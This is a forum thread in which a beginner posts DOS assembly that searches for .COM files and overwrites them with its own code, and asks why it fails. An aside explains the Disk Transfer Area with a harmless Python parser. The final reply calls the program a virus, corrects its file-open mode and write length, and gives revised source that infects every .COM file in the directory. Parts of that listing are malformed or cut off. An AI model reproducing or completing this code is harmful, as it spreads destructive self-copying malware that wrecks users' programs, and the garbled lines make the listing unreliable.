The lines of code below are borrowed from the print media. My focus is on the assembly; so by making use of these lines, I am trying to understand certain features of the assembly that are unclear to me. I was able to follow a few lines of code, and then the going got tough.

.model small
.code
FNAME             EQU    9Eh
                  org    100h
Start:
                  mov    ah, 4Eh
                  mov    dx, offset  com_file
                  int    21h
search _lp:
                   jc    done
                  mov    ax, 3D01h
                  mov    dx, FNAME
                  int    21h
;
                 xchg    ax, bx
                  mov    ah, bx
                  mov    cl, 42
                  mov    dx,100h
                  int    21h
;
                  mov    ah, 3Eh
                  int    21h
                  jmp    search_lp
Done:
                  Ret

Com_file           db     ‘*.com’ , 0     
End start

The plan in the lines below is to search for a .COM file, so the register must be set up before the interrupt service routine is used to seek the help of DOS.

mov   ah, 4Eh
mov   dx, offset  com_file
int   21h.

1. A value 4E hex is moved to ah register
2. The offset is moved to register DX
3. Interrupt service routine 21h used.
Result being successful, carry flag CF is set to 0, so the execution doesn’t jump to DONE but continues to the next line, which is trying to open the found file:

mov   ax, 3D01h
mov   dx, FNAME
int   21h

1. Now, 3Dh is moved to ah, and 01h to al
2. FNAME is moved to dx
…………………………….......Well, this is where I encountered my own interruption.

DX must point to the address of the file in memory, the file we have located; the file that we want to open. How is that address (of the file that we want to open) linked to a label!! How FNAME is used here in this context is what escapes me… Be kind enough to explain and enlighten the obscure part in my understanding... thank you.
Regards…

…..The tough get going..
But for lesser earthly ones like me, it’s tough all the way.
Your tip on the location where the actual filename of the found file will reside is well appreciated. But, I must confess that I could not make much headway in that direction especially with DTA.

So, in the meantime I tried to assemble the file and noticed a few typing slip-ups, which I corrected as:

mov       dx, offset  search
                 int       21h
;
open:
                  jc       done
                  mov      ax,3D01h
                  mov      dx, FNAME
                  int      21h
;
                  xchg     ax,bx
                  mov      ah, 40h
                  mov      cl, 42
                  mov      dx, 100h
                  int      21h
;
                  mov      ah, 3Eh
                  int      21h
                  jmp      open
Done:
                  Ret

search       db       " *.COM" ,0

I am attaching the assembled .exe; I don’t have any isolated environment to test it. So, if you find it worthwhile to open it, maybe you could let me know the result of running the file. (I am sure you don’t need to run it to know the result!!)

xchg ax,bx
For the moment, would you care to tell me the purpose of the above line of code?

Regards...


I had this file find.exe assembled using tasm

.model small
.code
FNAME     EQU   9Eh
          org   100h
start:
          mov   ah, 4Eh
          mov   dx, offset comfile
          int   21h

;if search is successful,search function formats 43 bytes of data in DTA.

searchresult:
          jc   done            ; search successful,and CF is 0=No jmp
 
          mov   ax,3D10h            ;3D=open  ;10h=read/write
          mov   dx,offset FNAME          ;data in DTA provides the name  
                                             ;of the file found.
          int   21h

;if successful,dos will return a handle in ax

          xchg ax,bx        ;So,bx gets file handle from ax.
          mov  ah,40h    
          mov  dx,100h      ;ds=data to write                         
          mov  cl,42        ;cx=number of bytes to write
                         
;We have, AH = 40h ;BX = file handle;CX = number of bytes to write DS:DX -> data to write
          int  21h

          mov  ah, 3Eh       ; close the file
          int  21h
done:
       ret
;
comfile      db  "*.COM",0
       End start

---------------------
I had another file ab.com linked using (tlink ab.obj /t) in the same directory with the following lines:

.model tiny
.code
          org 100h
;
start:
          mov dx, offset hello
          mov ah, 09h
          int 21h
;
          mov ax, 4c00h
          int 21h
;
hello  db  "Seem to have no effect on me $ "
          end start

---------------------
By running find.exe in the same directory as that of ab.com, I was expecting to see ab.com get altered. But nothing ever happened!!
Where did I go wrong???
How do I make certain that this finder file has found ab.com at all?
DTA??
How do I locate the DTA??
Please provide some information that is a little easier for this beginner, learner to grasp.

Regards...
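
An added example, not part of any post in this thread: DOS writes the 43-byte find record into the Disk Transfer Area, which by default sits at offset 80h of the program's PSP, and the found name starts at offset 1Eh of that record, hence 80h + 1Eh = 9Eh for FNAME. The Python sketch below parses that record from a constructed PSP image; the function names and the sample values (AB.COM, size, timestamp) are made up for illustration.

```python
import struct

PSP_DEFAULT_DTA = 0x80   # default DTA starts at PSP offset 80h
DTA_FIND_SIZE = 43       # bytes filled in by INT 21h AH=4Eh / AH=4Fh
DTA_NAME_OFFSET = 0x1E   # ASCIIZ 8.3 name inside the find record

# 21 reserved bytes, attribute byte, time word, date word,
# size dword, 13-byte ASCIIZ name: 21+1+2+2+4+13 = 43 bytes
_FIND_RECORD = struct.Struct("<21xBHHI13s")


def parse_find_record(psp: bytes, dta_offset: int = PSP_DEFAULT_DTA) -> dict:
    """Decode the find record that DOS left in the DTA of a PSP image."""
    raw = psp[dta_offset:dta_offset + DTA_FIND_SIZE]
    if len(raw) < DTA_FIND_SIZE:
        raise ValueError("image too short to hold a find record")
    attr, time, date, size, name = _FIND_RECORD.unpack(raw)
    return {
        "name_offset": dta_offset + DTA_NAME_OFFSET,   # 9Eh by default
        "name": name.split(b"\0", 1)[0].decode("ascii", "replace"),
        "attributes": attr,
        "size": size,
        # DOS packs the date as yyyyyyym mmmddddd and the time as
        # hhhhhmmm mmmsssss, with seconds stored in 2-second units
        "modified": "%04d-%02d-%02d %02d:%02d:%02d" % (
            1980 + (date >> 9), (date >> 5) & 0x0F, date & 0x1F,
            time >> 11, (time >> 5) & 0x3F, (time & 0x1F) * 2),
    }


def build_sample_psp() -> bytes:
    """Constructed 256-byte PSP image holding a find record for AB.COM."""
    psp = bytearray(256)
    date = ((1995 - 1980) << 9) | (6 << 5) | 15   # 1995-06-15
    time = (12 << 11) | (30 << 5) | (20 // 2)     # 12:30:20
    record = _FIND_RECORD.pack(0x20, time, date, 54, b"AB.COM\0")
    psp[PSP_DEFAULT_DTA:PSP_DEFAULT_DTA + DTA_FIND_SIZE] = record
    return bytes(psp)


if __name__ == "__main__":
    print(parse_find_record(build_sample_psp()))
```

In a debugger the same bytes can be inspected by dumping the PSP segment from offset 80h after the find call returns with the carry flag clear.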

I guess you're trying to make a virus. You have a few mistakes in your code.
First off, on your mov ah, 4eh, cx needs to be loaded with a file value (hidden, archive, r/o).
When you open a file, yes you do move ah, 3d, however 10h is not valid for al. You want al to be loaded with 02h (read & write). Last off, you need to change cx to the size of the virus.
A few last words before I give you a source: this virus you tried to write will only infect the first file found; also you need your virus to be com in most cases if you want to infect com's.

start:
mov ah, 4eh
lea dx, comfile
XOR cx, cx
next:
int 21h
jnc open
jmp exit
open:
mov ax, 3d02h
mov dx, 9eh
int 21h
xchg ax, bx
infect:
mov ah, 40h
lea dx, start
mov cx, vend, start
int 21h
mov ah, 3eh
int 21h
search:
mov ah, 4fh
jmp next
exit:
int 20h
comfile db
